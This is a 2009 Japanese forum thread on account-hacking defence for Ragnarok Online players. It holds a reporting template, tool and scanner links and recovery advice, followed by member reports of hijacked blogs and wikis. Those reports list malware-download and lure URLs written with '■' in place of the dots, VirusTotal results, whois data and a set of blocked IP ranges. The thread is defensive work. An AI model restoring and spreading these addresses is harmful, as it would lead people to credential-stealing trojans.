(○口○*)さん <><>09/10/30 17:20 ID:OKbHXAgz0<> ■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■

アカウントハックに関する情報の集積・分析を目的とするスレです。
被害や攻撃等のアカウントハックの具体的事例及びセキュリティ全般の
話題を取り扱います。

!! 報告及び質問の前には、注意点 (>>2)を必ず読んでください !!
!! これを怠ると投稿が削除対象となる可能性があります !!

・ 報告用&質問用テンプレ (>>2)
・ 対策の参考情報アドレス (>>3)
・ このスレでよく出てくるアプリケーションやサイトとオンラインスキャン (>>4)
・ 安全対策の簡易まとめ、アカウントハック対応の要点とFAQ (>>5,>>6)
・ その他関連(>>7)

■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ ネタや程度を超えた雑談・脱線はご遠慮ください

・スレ立ては>>970がしてください。反応がなければ以降10ごとに。

【過去スレ】
【過去スレ】
・アカウントハック対策・セキュリティ 総合スレ Lv.4 ttp://enif.mmobbs.com/test/read.cgi/livero/1242218790/
・アカウントハック対策・セキュリティ 総合スレ Lv.3 ttp://enif.mmobbs.com/test/read.cgi/livero/1227396646/
・アカウントハック対策・セキュリティ 総合スレ Lv.2 ttp://enif.mmobbs.com/test/read.cgi/livero/1220220582/
・アカウントハック対策・セキュリティ 総合スレ ttp://enif.mmobbs.com/test/read.cgi/livero/1213363112/

以前のログはROセキュリティWiki(ttp://rosafe.rowiki.jp/)へ <>アカウントハック対策・セキュリティ 総合スレ Lv.5 (○口○*)さん<>sage<>09/10/30 17:21 ID:OKbHXAgz0<> 【投稿/相談/報告する際の注意点】
・アカハックアドレスはMMOBBSでは禁止単語になっています。
 加えて、誤クリックによる感染を防ぐ為にそのようなアドレスは
 .(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています)
・質問前後にテンプレ等を見て知識を深めると更にGoodです
・回答者はエスパーでは有りません。情報は出来るだけ多く。
 提供した情報の量と質に応じて助言の量と質は向上します
・結局は本人にしかどうにも出来ない事を忘れてはいけません

 ----------報告用テンプレ----------
● 実際にアカウントハックを受けた/怪しいアドレスを踏んだ時の報告用

【      気付いた日時          】 (被害に気付いた日時)
【不審なアドレスのクリックの有無 】 (blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス)
【他人にID/Passを教えた事の有無】 (Yes/No)
【他人が貴方のPCを使う可能性の有無】 (Yes/No)
【    ツールの使用の有無      】 (Yes/No、Yesの場合はそのToolの説明)
【  ネットカフェの利用の有無    】 (Yes/No)
【     OS    】 (Windowsのバージョン、ServicePack等まで書く)
【使用ブラウザ 】 (InternetExplorerなど、バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 (Yes/No/今から読みます)
【hostsファイルの変更】(有/無 [有りの場合は最終更新は何時ごろか])
【PeerGuardian2の導入】(有/無 [有りの場合は参照元サイトはどこか)
【説明】 (被害状況をできるかぎり詳しく書く) <> (○口○*)さん<>sage<>09/10/30 17:21 ID:OKbHXAgz0<> 【対策の参考情報アドレス】
・アカウントハッキングについて > 被害にあってしまったら(RO公式)
  ttp://www.ragnarokonline.jp/playguide/hacking/

・ROセキュリティWiki
  ttp://rosafe.rowiki.jp/
・ROアカウントハック報告スレのまとめサイト
  ttp://sky.geocities.jp/vs_ro_hack/
・ROアカウントハック対策スレのまとめサイトのhostsファイル追加分まとめサイト(臨時)
  ttp://sky.geocities.jp/ro_hp_add/
・安全の為に (BSWikiより アカウントハッキング対策についての情報まとめ)
  ttp://smith.rowiki.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
  ttp://lineage.paix.jp/
・FFXI(仮)
  ttp://ilion.blog.shinobi.jp/
・Alchemist service アカウントハック体験談
  ttp://air1.fc2web.com/as/id.html
・So-net セキュリティ通信
  ttp://www.so-net.ne.jp/security/
・セキュリティホール memo
  ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/
・Adobe Flash Playerの脆弱性および XREA広告サーバハッキング問題
  ttp://www.geocities.jp/ff11warning/content5/content5_xrea.html

※ 素人の検体の確保は大変危険です。手順を理解し安全に出来る人だけがしてください ※

・アンチウィルスメーカー各社検体提出先
  ttp://rosafe.rowiki.jp/index.php?%B8%A1%C2%CE%C4%F3%BD%D0%C0%E8
・VirusTotal
  ttp://www.virustotal.com/jp/
・VirSCAN.org
  ttp://virscan.org/ <> (○口○*)さん<>sage<>09/10/30 17:22 ID:OKbHXAgz0<> 【このスレでよく出てくるアプリケーション】
・PeerGuardian2 (PG2と略される。下記は対策スレのまとめサイトの簡単な手引き)
  ttp://sky.geocities.jp/vs_ro_hack/pg2.htm
  ・【PeerGuardian2 暫定ダウンロード先】
   現在本家から落とせないので、キャッシュを利用してください。下から7番目。
   ttp://web.archive.org/web/20080209171747/http://www.dukedog.flnet.org/trans.html
   文字化けして読めないと思いますが、こう書いてあります。
   必要な物をダウンロードしましょう。
     >PeerGuardian 2 for Windows β6b 日本語第2版 2000・XP・2003用 / 98・ME用 / ソースコード
     >PeerGuardian Lite (β050422) 日本語版 / ソースコード
  ・本家の英語版 ttp://phoenixlabs.org/pg2/
  ファイル情報
     pg2-050918-nt-jp.exe 1.34 MB (1,412,454 バイト)
     CBC9280A
     C55F4B13B568927B58965B93987CBE17
  ・【PG2導入の手引き】
   ttp://ff11.my-sv.net/pg2/install.html
     Vistaの場合は、PeerGuardian 2 RC1 Test を、フォーラム(登録が必要)にある
     ローダー経由で実行しないと、動作を開始しませんのでご注意ください。
・Peer Block(Vista/Win7の場合はこちらを利用してください)
  ttp://www.peerblock.com/
  ・Peer BlockをVista/Win7の起動時から管理者権限で起動するのに使える方法。
   ttp://www.blackcatlab.com/article.php/090804_SendKeys_under_UAC

【URLが危険か判断できない際に使われるサイト】
・ソースチェッカーオンライン (ソースや隠れたインラインフレームの転送先を確認できる)
 ttp://so.7walker.net/guide.php −−−2009/12/20運用終了予定
・aguse.jp (ゲートウェイからスクリーンショットした画面を見ることが出来る)
 ttp://www.aguse.jp/
 ここで安全と表示された場合でも、鵜呑みにして信用しないように。

【PCにウィルス対策ソフトを導入してない方へ ネットから出来るオンラインスキャン】
・Kaspersky Internet Security 試用版
  ttp://www.just-kaspersky.jp/products/try/
・カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
  ttp://www.kaspersky.co.jp/virusscanner
  ttp://www.kaspersky.com/virusscanner
  ttp://www.nifty.com/security/vcheck/kav/kavwebscan.html
・Windows Live OneCare PC セーフティ
  ttp://onecare.live.com/site/ja-jp/center/howsafe.htm <> (○口○*)さん<>sage<>09/10/30 17:24 ID:OKbHXAgz0<> ・BitDefender オンラインスキャン
  ttp://www.bitdefender.com/scanner/online/free.html
・F-Secure オンラインスキャナ
  ttp://www.f-secure.com/ja_JP/security/security-lab/tools-and-services/online-scanner/index.html
・Panda ActiveScan2.0
  ttp://www.ps-japan.co.jp/homeuser/content0001.html
・ウイルスチェイサー for WEB(Dr.Webエンジン)
  ttp://www.viruschaser.jp/support_online.html
【安全対策の簡易まとめ】
以下は要点となります。詳しくは関連サイトを見てください。

 ・アドレスをホイホイ踏まない。よく確認する。(IP直書きの数字のアドレスなど)
 ・特に掲示板等に貼られた拡張子まで書いてあるURL(.src exe 等)は絶対にクリックしない。
 ・出所の怪しいプログラムやスクリプトを実行しない。
 ・定期的なMicrosoftUpdate及び、各種ソフト(各種Player、Reader等)のアップデートを行う。
 ・アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新を行う。
 ・パーソナルファイアウォールソフトの導入する。
   ・hostsの利用した危険ドメインのブロック
   ・PeerGuardian2を使った危険IPのブロック など
  (※hostsは定期的な更新が必要です。更新をサボりがちな人はhostsファイル更新スクリプト
    (ttp://acopri.rowiki.jp/index.php?hostsRenewScript)の導入も視野にいれましょう)
 ・通常のネット閲覧はIEの使用を止め、他のブラウザに乗り換える(Firefox、Opera等)
 ・IEを使う場合は下記を設定
  ・信頼できるSite以外ではスクリプトやActiveXを切る
   :インターネットオプションのセキュリティの部分で設定可能
  ・偽装jpg対策(IE6SP2以降。IE6SP1以前では設定出来ない)
   :インターネットオプション→セキュリティ→レベルのカスタマイズ
   →「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする <> (○口○*)さん<>sage<>09/10/30 17:42 ID:OKbHXAgz0<> 【アカウントハック対応の要点とFAQ】
以下は要点となります。詳細な物は関連サイトをご覧下さい。

● 『アカウントハックアドレスを踏んだ』もしくは『ウィルスが見つかった』場合
 1) 速やかに感染PCのネットワークケーブルを外す
 2) 『安全な環境』から諸々のパスワードをすべて変更
 3)必要最低限のデータをバックアップ
 4)ウィルス駆除 もしくは OSのクリーンインストールやPCの再セットアップを行う
 5)セキュリティソフトの導入
 6)OSのアップデート(前もってSP+メーカーを利用すると安全にアップデートを行う事が出来ます)
 7)安全な環境になったらバックアップしたデータの書き戻し

注)
 ・安全が確認されるまで感染したPCからはNetworkに接続・ROクライアント起動・公式にログインは厳禁
 ・当然パスワード入力を伴う行動や各種メッセンジャーソフトやメールクライアントの起動も避ける
 ・変更するべき物は以下のとおり
  『ガンホーID(旧GungHo-ID)パスワード』『キャラパスワード』『メールアドレス』
  『ガンホーID変更』(ID自体の変更)は一度に限り行える。
 ・アンチウイルスソフトの過信は禁物。
  自信がなければクリーンインストール、PCの再セットアップを第1選択肢とする事。
 ・対応は慎重かつ迅速に行う事。早期に対応できればアカウントハックを防げる確率が上がる。
 ・大事なデータはバックアップは取っておくこと。(常日頃からしておくと楽)


● 関連FAQ
・『安全な環境』ってどんな物?
  ウイルスの感染が無いと思われる環境です。別PCや携帯電話・据置型ゲーム機・1CD Linux等が挙げられます。
・『安全ではない環境』ってどんな物?
  インターネットカフェ等、不特定多数が使用する環境。
  また知人友人のPCもインターネットカフェ並の危険があるものと考えるべきです。
・知り合いに頼んでパスワード変更してもらうのはダメ?
  いくら信頼できる友人でもパスワードを教えるのは良く有りませんし、その友人がウィルスに感染してないとも限りません。
  知り合いに頼むのは最後の手段であり、安全な環境が構築出来次第、再度パスワードを変更しましょう。
・オンラインウイルススキャンをしたいんだけど、やっぱりネットにつないじゃ駄目?
  駄目です。
・アンチウイルスソフトでウイルスが見つからないのでもう大丈夫だよね?
  100%の保証は出来ません。ウィルスが見つからなかった場合、チェックに使ったアンチウィルスソフトでは発見出来なかっただけです。
  安全かどうか自信が無い場合はHDDをフォーマットの上、PCの再セットアップを考えるべきです。 <> (○口○*)さん<>sage<>09/10/30 17:44 ID:OKbHXAgz0<> 【クリーンインストール・リカバリ・PCの再セットアップの時に便利なツール】
・SP+メーカー (最新の Service Pack を適用させたインストールCDを作成するツール)
  ttp://www.ak-office.jp/
   ・SP+メーカーのFAQ書庫(有志がまとめたWiki形式のページで上記ツールのFAQ)
     ttp://wikiwiki.jp/faqwinsppm/

【短縮アドレスについて】
Q.TinyURLの短縮アドレスが怖くて開けない。クリックする前にどんなページか分からない?
 ttp://www.oshiete-kun.net/archives/2008/07/tinyurl.html
A.設定変更で直接飛ばないようにするか、チェック用のブックマークレットを使うのがオススメ
>実は、TinyURLは、ユーザー側で設定を変えておくと、短縮済みURL→実URLの間に、2ちゃんねるの「ime.nu」のような
>中継ページを挟ませることができる。その分毎回クリックの手間が増えるわけだが、怪しげなサイト・掲示板などに行く機会が
>多い人は設定を変えておくと良いだろう。また、「ブックマークレット」という仕組みを使うと、TinyURLのリンクをブラウザ操作で
>実URLに書き換えることも可能だ。Firefoxユーザーなら、同じような書き換えを自動で行うグリースモンキースクリプトも利用できるぞ。

注)TinyURLの補足
短縮URLのアクセスに対しクッションページを設定できるので、有効化しておくことを強く推奨。
tinyurl■com/preview.php
enable previewsを選択することで、設定内容がcookieに保存される。
使用しているブラウザごとに実行する必要があるが、有効期限は取得時刻+10年
  補足:まとめ臨時サイトのhostsリストではtinyurl■com自体をリストに加えていますので、
     利用する場合は一旦上記ドメインを編集してリストから削除して実行する必要があります。
     (ただし、tinyurl自体規制しているので意味が無いかもしれない。)

【AntiVir等の誤検出の提出先】
analysis.avira.com/samples/
のFile typeをFalse Positiveにして下に説明を書いて提出。(@は全角)
ALWIL Software(avast!) <virus@avast.com>
Avira GmbH(AntiVir) <virus@avira.com>
 注:他はROセキュリティWikiのアンチウィルスメーカー各社検体提出先にまとめてあります。
   ttp://rosafe.rowiki.jp/index.php?%B8%A1%C2%CE%C4%F3%BD%D0%C0%E8

【ウイルスの予備知識】
・検証ラボ:ウイルスを観察してみる
 ttp://itpro.nikkeibp.co.jp/article/COLUMN/20080402/297763/ <> (○口○*)さん<>sage<>09/10/30 17:44 ID:OKbHXAgz0<> >>テンプレ投入先未定
・都道府県警察本部のサイバー犯罪相談窓口等一覧
ttp://www.npa.go.jp/cyber/soudan.htm
#RO公式のアカハック対策からも飛べるけど、スレ内でアンカーを張って示したい時用。
・DriveImage XML Backup Software - Data Recovery Product
ttp://www.runtime.org/driveimage-xml.htm
#フリーで多機能なHDDイメージ取得ソフト。使い方は ttp://pnpk.net/cms/archives/137 などを参考に。


便利そうなものの紹介。

CDブートで利用できる無償のマルウェア検査・駆除ソフト(Dr.WEB LiveCD)
ttp://internet.watch.impress.co.jp/cda/news/2008/11/26/21647.html
ttp://drweb.jp/support/LiveCD.html

BitDefender レスキューCD
ttp://download.bitdefender.com/rescue_cd/

Avira rescue CD
ttp://www.avira.com/en/company_news/rescue_cd_.html

USBワーム対策とスキャン軽量化「ESET Smart Security V4.0」
ttp://internet.watch.impress.co.jp/cda/news/2009/05/12/23400.html
ttp://www.the-hikaku.com/security/ESET/ESET_v4-1.html
ESETにもレスキューCDができるらしい。

F-Secure レスキューCD
ttp://www.f-secure.com/ja_JP/security/security-lab/tools-and-services/rescue-cd/index.html <> (○口○*)さん<>sage<>09/11/02 18:15 ID:02/mKppx0<> 保守…しとくべき? <> (○口○*)さん<>sage<>09/11/02 18:20 ID:gRLAXrog0<> あー、そういや、保守必要かもな。 <> まとめ臨時 ◆kJfhJwdLoM<><>09/11/02 19:58 ID:v3gW/pCl0<> RWC2009のカンファレンスで2010年初頭の予定で
新セキュリティ対策の「ワンタイムパスワード」サービスが発表されました。

今までのパスワードに加えて"ワンタイムパスワード"を入力する方式。
携帯電話のサービスで任意加入の別途料金。 <> (○口○*)さん<>sage<>09/11/02 20:13 ID:xxwjFCWN0<> まぁ、別途料金は仕方ないですが良いと思います。 <> (○口○*)さん<>sage<>09/11/02 22:26 ID:Zc13x1Fz0<> SecurOTP Module と書いてあったから凸版フォームズのやつだろうか?
知ってるやつが採用されず残念…… <> (○口○*)さん<>sage<>09/11/02 22:34 ID:awMp3fva0<> 4gamerのソースも来ていたので貼り。
ttp://www.4gamer.net/games/001/G000183/20091102002/
Secure OTPで検索すると引っ掛かるけど、導入するのはここのASPソリューションなのかな?
ttp://www.thirdnetworks.co.jp/sotp/01scotp01.html

物理トークンの場合と比べてランニングコストは増えるけど、初期コストが不要なのと
紛失した時の対応が携帯キャリアの提供範囲で可能なのがメリットなのかな。 <> (○口○*)さん<>sage<>09/11/03 15:15 ID:hEHGamBD0<> みてきたけどカードで表示とかどうやってるんだ
誰か教えてくれw <> (○口○*)さん<>sage<>09/11/03 15:18 ID:fk9cW4OF0<> http://www.ctech.co.jp/products/otp/
押すたびに違う表示が出るんでね?
わからんが <> (○口○*)さん<>sage<>09/11/04 09:37 ID:jKeJeu6a0<> Java SE Runtime Environment 6 Update 17リリース <> (○口○*)さん<>sage<>09/11/04 14:32 ID:ObiuM4VR0<> AVG9.0Freeつかってみてるけどもっさいなあこれ <> (○口○*)さん<>sage<>09/11/04 16:25 ID:jKeJeu6a0<> IEのパッチが出たのでUpdateかけましょう <> (○口○*)さん<>sage<>09/11/05 10:34 ID:7gbYseDw0<> 福建中華は2ちゃんなんかでは生きてるドメイン総動員してあちこちに爆撃をしている一方で
ここに来てまたFC2ブログ改竄を活発化しているな。
10月末から2件発生、メイプル系やハニーポット状態の赤石掲示板で爆撃を確認。
1つは通常更新されてたため連絡がつき、管理者がクローズしたのでよかったが
もう1件は管理放棄で連絡つかず。

rin0529■blog62■fc2■com : メイプル系ブログ、10/29のキャッシュで改竄を確認、現在非公開設定
natunama■blog19■fc2■com : 管理放棄

どちらも仕込まれているのは4gamerankingだが改竄手法に再び変化が見られる。
ここしばらくはブログの一番下、ソースを見たりスクロールさせないと見えない場所がほとんどだった。
今回の2つはブログの一番上、Opera/Firefoxならすぐに見える場所。
中華の兆発かな?「IFRAME規制できるもんならしてみろ」と言う。

この調子で行くと近いうちにまた大きなサイトへの改竄攻撃が起きそうな気がしないでもない。
気をつけてくれよな! <> (○口○*)さん<>sage<>09/11/05 18:08 ID:GeeddNGL0<> アク禁で書込めないようなので、転記。


Shockwave Playerに深刻な脆弱性、Adobeが対処

ttp://www.itmedia.co.jp/enterprise/articles/0911/04/news024.html

一時期無害化されていたGumblarがまた活動を再開 <> (○口○*)さん<>sage<>09/11/05 18:53 ID:sOpxFsdO0<> >>19の補足。
10月の修正パッチ「MS09-054」に不具合、MSが修正版を公開
ttp://internet.watch.impress.co.jp/docs/news/20091104_326262.html
>マイクロソフトは3日、10月14日に公開したセキュリティ更新プログラム(修正パッチ)「MS09-054」を適用した場合に
>不具合が発生する可能性があるとして、新たな修正パッチを公開した。 <> (○口○*)さん<>sage<>09/11/06 00:37 ID:NdmWXXS/0<> http://abk00■blog71■kfc2■com/

ここを開いたとたんカスペルキーが反応。
Trojan-Downloader.JS.Iframe.bxv というトロイの木馬らしい。しかも1件遮断できずに処理エラー。
ROどころかネトゲとはまったく関係ない同人絵サイトなんだけど
こんな無関係そうなサイトでもトロイがしかけられるようなら巡回専用で1台PC用意したほうがいいのか? <> (○口○*)さん<>sage<>09/11/06 00:37 ID:wkg91qeB0<> >>20
もう1つあったよ。
nrf35194■blog54■fc2.com/
FC2には通報済み。
これは過去の他の改ざんと同じ</body>の直前だね。
入れる場所変えることで発覚しにくくってことなのかもしれない。 <> (○口○*)さん<>sage<>09/11/06 00:41 ID:Kr5UK8rp0<> >ROどころかネトゲとはまったく関係ない
何を今更としか言えない

今は仕掛けることが可能なサイトなら、どこにでも仕掛けるのが普通ですよ <> (○口○*)さん<>sage<>09/11/06 02:55 ID:Hmw/7UVS0<> 本人が直接ネットゲームに関っていなくとも、サイトやBlog/miniBlog、mail、IMなどを介して
繋がりのある周辺への攻撃踏み台にはなり得るからね。
知人・友人というのは意外な落とし穴となる可能性を孕んでいる。 <> (○口○*)さん<>sage<>09/11/06 04:58 ID:En6j842C0<> >>23
さっき見たけどソースにはIFRAMEが見当たらず。誰かが除去したか?

>>24
更新日付から放棄はしていないと思うからブログ管理者に非表示コメで教えて上げた方が良いな。
FC2に通報だけだと管理者の過失扱いでブログが消される可能性極大。

おそらくは末尾に仕込むケースでは最後の方?
URLをぐぐると10/12の時点で既に汚染されているようだ。
管理者自身も感染している可能性もあるな。

>>20の改竄は10月末なんでこの間に改竄手法を変えたのだと思う。
ブログサービスにより仕込み場所がほぼ固定だったので今後暫くは上に仕込むかもしれない。
ちなみに最近悪用を確認できていないTEACUPのAUTOPAGEでは殆どプロフィール欄付近に仕込んでいた。

ネトゲと無関係なものまで改竄されているからやっぱりFC2ブログは全員改竄の順番待ち状態と行って過言ではないだろうね。 <> (○口○*)さん<>sage<>09/11/06 06:30 ID:wkg91qeB0<> goodol.kenjiro■net/ でもカスペルスキーがTrojan-Downloader.JS.Iframe.bxv判定を出すらしい。
あとURLがわからないんだけど女神転生のサイトでもそう言うところがあるらしい。
いずれもthickbox.jsが入ってる。

mumumu■gensoan.com/2009/11/06000950.html
誤判定っぽいと書いてるところ↑

ただthickbox.jsは過去にこういうことがあったらしい
ソース上に出てくる理解不能なコードについて oshiete1■goo.ne.jp/qa4944729.html

>>23のやつは
rss.rssad■jp/js/rss/wb.js
rakugaki■kayac.com/rakugaki_tag.php?rid=49240
のどっちかに反応してるのかも

>>27
XSSの脆弱性を指摘されてるけど直ってないんじゃなかったっけ? <> (○口○*)さん<>sage<>09/11/06 07:31 ID:Hmw/7UVS0<> 仕込まれたままの非ゲーム系Blogの例。
://kyokatsu722■blog54■fc2■com/
遂にはGoogle先生(SiteAdvisor)にもレッドカード判定を下されている状態。こうなると本人の信用失墜に至る一方だろう。 <> (○口○*)さん<>sage<>09/11/06 13:58 ID:xgvUVu6e0<> FireFox v3.5.5 11/5リリース
通常ニュースが見つからなかったので、リリースノートのURLはっときます。
ttp://mozilla.jp/firefox/3.5.5/releasenotes/ <> (○口○*)さん<>sage<>09/11/06 23:40 ID:lbtStpAD0<> >>29
仕込みはおそらくFC2運営の手で消されたな、今現在確認できず。
10/26にはECOスレなんかで中華の誘引書き込みがあるから過去のケースからしてやられたのは25辺りか
そしてそのリンクは興味深いものがあるな。
(改竄ブログ)/?template=business-u1&index

テンプレート? <> (○口○*)さん<>sage<>09/11/07 03:36 ID:ZUU7Pi+A0<> >>31
FC2ブログは謎の仕様があってね。
公式及び共有テンプレートを自分のブログのみならず、他人のブログに当てて見ることが出来る。

テンプレートプレビューの技
etemplate■blog92■fc2.com/blog-entry-54.html

(改竄ブログ)/?template=business-u1&index で罠誘導コメントが書き込まれていたなら
business-u1という共有テンプレートそのものに仕込まれていた可能性もあるね。 <> (○口○*)さん<>sage<>09/11/07 04:26 ID:ZUU7Pi+A0<> 一応誤解がでるかもしれないから書いておく。 連投ごめん。
FC2ブログに共有テンプレートを申請して許可が下りた後もテンプレートは作者の手元の残ってる。
だから申請が通った後に何か不具合が見つかってもすぐに修正が可能なんだけど
再度それを申請する必要はないらしい。
あとから怪しいものを仕込むことが可能ということね。
フォーラム見ると、アダルトサイトへのバックリンクがある共有テンプレートが見つかったとか
隠しアクセス解析やらカウンターやらが埋まってるとか報告がある。

ただ、公式&共有テンプレートを見て気に入った人がDLすると
HTMLとCSSはその人のブログスペースにコピーされるので
既にDLされてしまったものにはテンプレート作者の変更は反映されない。
また一人でいくつもDLできるので、上手いこと罠入りテンプレートがDLされたとしても確実に使われるとは限らない。

共有テンプレートに仕込まれてしまった場合、テンプレートを探している人がプレビューで見ても感染する可能性があるし
(改竄ブログ)/?template=business-u1&index
こういう風に他人のブログにテンプレート当てていくらでも改ざんブログっぽいものが作れてしまう可能性がある。 <> (○口○*)さん<>sage<>09/11/07 05:15 ID:m0YwLSad0<> 結局は、運用側の体質や体制に隙があるから、そこをつけ込まれやすいということだな。
xreaも基本が放置体質だから、ワードサラダspammerに愛されているのが実状だし。
有料サービスのCoreServerですら、耐障害性が低く1週間近くのサービス不能状態に陥ったりしてる。 <> (○口○*)さん<>sage<>09/11/07 14:41 ID:5X1JT4Ij0<> >>24のブログも仕込み場所が変更され、最下部から最上部になったな。
当分はブログ最上部仕込みが連中の対FC2テンプレになりそうだ。 <> (○口○*)さん<>sage<>09/11/07 16:22 ID:8tptDYnY0<> 規制されて書けないようなので代理書き込み


ローグwikiに爆撃されてたURLを転載。
rdtr7t3q433■toypark■in/images/

軽くソースチェッカーで調べるとzipファイルを落とさせるっぽい。 <> (○口○*)さん<>sage<>09/11/07 19:18 ID:5X1JT4Ij0<> >>36
toyparkはドメインがinだけど日本語でレンタルサービスをやってるトコ。
つまり簡単に通報して潰すことが可能。 <> (○口○*)さん<>sage<>09/11/07 20:14 ID:utMpD0i/0<> >>36
そのファイルは0KBだったけどファイル名検索したらうpろだが出てきた
VirusTotalは1ヶ月前にも履歴があった(13/40)
いまの結果 (27/40)
ttp://www.virustotal.com/jp/analisis/e8a326b18bfd0cadf9c3382847e4efc0a7aec43441b93ed6cea4fb726932c662-1257591793

全く同じかはわからないけどね <> (○口○*)さん<>sage<>09/11/07 20:26 ID:yCKBuKq40<> 各地のWiki爆撃で貼られていたアドを3つ。
といっても、1つは>36で報告されてるけど。

>www1■uploda■tv/v/uptv0050542■rar   ※うpろだ.tv
>77c■org/p■php?f=nk11198■zip&c=91e4  ※ななしorg
>rdtr7t3q433■toypark■in/images/       

上2つは中身は(EXE名は違うが)一緒のEXE。
タイムスタンプ:2009/09/29 16:41:00
ファイルサイズ:46080byte

>www.virustotal.com/analisis/6de61ac7381516044603c24512e12e25f62abb5ebefba2b3dc63db03bdb0766b-1257592274
>Result: 29/40 (72.5%)
>Kaspersky 7.0.0.125 2009.11.07 Trojan-GameThief.Win32.OnLineGames.vrdy

御三家の中ではSymantecがスルー。

toyparkのは>38と同じで0byteだったので中身確認出来なかったが
Wiki改変履歴を見ると toypark→アプロダURL の流れで改変されてた。
同一犯の仕込みだから、中身は同じEXEだったのかも。 <> (○口○*)さん<>sage<>09/11/07 21:06 ID:hUwiinAH0<> BSWikiの中の人です。とうとうやられました。
詳しい報告は後にさせて頂くとして、まずは情報だけ。

投稿者のIP:211.8.210.134 (211008210134.cidr.odn.ne.jp)
書き込まれたアドレス:http://77c■org/p■php?f=nk11198■zip&c=91e4

ODNからは投稿禁止にしていたつもり…だったんですが、ne.jpの方を
失念していたせいでやられてしまいました。とりあえず現在BSWikiは全て終わるまで
機能を停止させています。

ツカレテイルノニ…ネムタイノニ… <> (○口○*)さん<>sage<>09/11/07 22:05 ID:R+0IaAPt0<> 他ゲームの弱小Wiki管理人です
当Wikiサイトではcidr.odn.ne.jpのうち、株式会社アイピーコアに割り当てられたレンジは弾いています
同社は中国系のレン鯖etc..業者で、これまで数々のマルウェアリンクの送信元になっています
弾いている範囲は以下のとおり
61.196.212.128/28
210.231.114.128/26
210.231.115.0/26
210.231.115.128/26
211.8.146.64/26
211.8.147.128/26
211.8.156.128/26
211.8.210.128/26

自分がOFSfb-利用者なので苦々しく思っています <> (○口○*)さん<>age<>09/11/07 22:26 ID:ubC8Ui4l0<> 管理人さん達お疲れですよ。
今この時間も中華は再爆撃しているようで。大事な事なので(ry ってか。
Wiki3つ4つ直してきたけど…

ニコ動のアドレスに似せたヤツもあったので注意喚起。でageますよ
rolinkgame■ueuo■com/watch/sm92938 <> (○口○*)さん<>sage<>09/11/07 22:51 ID:PgA01Zll0<> >>42
ueuoもフリーホスティングサービスだな。
こっちは英文であるな、エキサイト翻訳でも通してゴルァを送信すると良いかも。 <> (○口○*)さん<>sage<>09/11/07 23:14 ID:8p8GmXxS0<> >>39
同じかもしれないなあ
セキュ板に提出しときます <> (○口○*)さん<>sage<>09/11/07 23:15 ID:utMpD0i/0<> あらP2のままだった
>>44=>>38です。すいません。 <> (○口○*)さん<>sage<>09/11/07 23:47 ID:utMpD0i/0<> 連投すいません
>>38補足
VirusTotalが元のzipごとだったので一応exeのみでも診断
29/40
ttp://www.virustotal.com/jp/analisis/6de61ac7381516044603c24512e12e25f62abb5ebefba2b3dc63db03bdb0766b-1257604846 <> (○口○*)さん<>sage<>09/11/07 23:59 ID:m0YwLSad0<> >>40,41
お疲れさまです。
odnの特定CIDRからの攻撃が特に多くみられるようですが、この件についてJPCERT/CCへ
インシデント報告という形を取ってみるのは如何でしょう。
既に実施済みでしたら、蛇足すみません。
ttp://www.jpcert.or.jp/form/

問題が長期に亘り継続していること、ISPへの通報も効果が薄いことから、こういったアドバイザリ機関の介入を
望むのも仕方がない状況になっているかと思われます。
特に、RO関連は管理者ML連名にて報告を挙げることにより、被害が決して特定のサイトのみに留まっていないことを
再度認識してもらえるのではないでしょうか。 <> (○口○*)さん<>sage<>09/11/08 10:35 ID:guSG/urp0<> avastはかなり弱そうだ <> (○口○*)さん<>sage<>09/11/08 11:02 ID:dW1Pxp2p0<> >41
貴重な情報、助かります。
さっそく活用させて頂きます。

>46
>39のEXEとハッシュが一緒なので、同一ファイルだね。 <> 夢 ★<>sage<>09/11/08 15:44 ID:???0<> > 698 名前:シルウィ[] 投稿日:09/11/08(日) 15:16 ID:sD5amUb20
> 狩場、敵、アイテムの全データが相互にリンクしていて使用感抜群。更新終了。
> http://www■infoseik■com/jp/

垢ハクだと思われる書き込みを念のためこちらに転記しておきます <> (○口○*)さん<><>09/11/08 15:54 ID:TZYKF2l/0<> 本当は、infoseekだっけ? <> (○口○*)さん<>sage<>09/11/08 15:59 ID:lOudyDvl0<>   Domain Name: INFOSEIK■COM
  Registrar: HOOYOO INFORMATION TECHNOLOGY CO.LTD.
  Whois Server: whois.cn.hooyoo.com
  Referral URL: http://cn.hooyoo.com
  Name Server: NS5.MYHOSTADMIN.NET
  Name Server: NS6.MYHOSTADMIN.NET
  Status: clientDeleteProhibited
  Status: clientTransferProhibited
  Updated Date: 20-oct-2009
  Creation Date: 20-oct-2009
  Expiration Date: 20-oct-2010

偽infoseek系の補充か。でも、infoseekってそんなにシェア高かったっけ。現エンジンはYahoo系と同じものだし。
国内ローカルでクレームが飛んでこないのをいいことにターゲットにしているのだろうか。

ただ、このレジストラは初見のような気がする。 <> (○口○*)さん<>sage<>09/11/08 16:10 ID:W7VUr03z0<> しかし相変わらず紹介文が下手糞だよな
パッチがきたわけでも更新終了してちゃ誰も見に来ないだろうにw <> (○口○*)さん<>sage<>09/11/08 16:34 ID:0AxsKcts0<> ttp://www.mmobbs.com/uploader/files/7907.png

あるリンク集の「RAGNAROK online 狩場情報」についての紹介文をそのまま引用したらしい
狩場情報ひっそりの前身だっけかこれ

「RAGNAROK online 狩場情報」がinfoseekだから、infoseekに偽装したのかもしれない <> (○口○*)さん<>sage<>09/11/08 17:04 ID:W7VUr03z0<> それっぽい日本語のコメントを適当にコピペしただけなのかな
大体の意味くらいなら機械翻訳とかで判るだろうし

